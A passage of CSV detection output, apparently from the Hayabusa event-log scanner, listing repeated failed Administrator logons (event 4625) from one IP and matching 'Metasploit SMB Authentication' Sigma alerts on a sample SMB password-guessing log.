SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sE7pzfiKRfOb2dH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxL1cV8OiFVRfj4I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHs8Z8XPLg58jZ1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: i6kRLlJt3Oxwhdgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s4kTwriHAKVsTqzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jfitpZ5ZrzBfpNf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdcU6ypEEeIAugGI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jIMfGIU1pHasO88g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHsxKEQK7CWSqprp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QkC70klP6mv8YZrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3YM3zaZk64qqq7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mOLbk23zOqQLZYZU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0tlyXqvCQJVqaB5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: npjQlHcGls5gENng : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7buinUqketmW3Ib6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rs5gYGs6JBf2yV1J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67hYMvtmbrmv5LHn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtV42zBnWwRCLfJS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jnaPNm28FvbFfM8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCEvKO14gPFHAZIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iJJyXCm1YOI2uIAS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MNAScx4qMKxCJQdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKTHsNA29ZnPHCHQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: CjvAb3sjN0PM8my4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wYQ6HuRSMh8DXzMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZgejUxgojDE1kR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2L4yO411OUnkRGWQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O3mGCNGFML75P7w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6CBslPz31UACz0wR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4Y8V0wB6unpmFXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXSbx81GD6dYgHtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWbnppJfJ0Ll9oLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoUjizV5iXImPGTe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: HHNG9oylnT46IObg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LUeAisNPQULjD2t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2sB5MlRw4Ox1OWdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WaklWtKd8QByH8M : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nzvyy6CUk43SVxZW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xeolvnD92qP1dJPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDvRwPbu6yQH2pEf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxKdofXKKkCLn2n6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkO9p50Q9iFolbmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p01SZCA784xmPMe2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: XKaI3FHBbBXvVsES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmUk6sW8QreDIZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0w9SSWaaTX7chM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 46vgsyX5Wxn2rupf : IP Address: 192.168.198.149 : AuthPackage: 
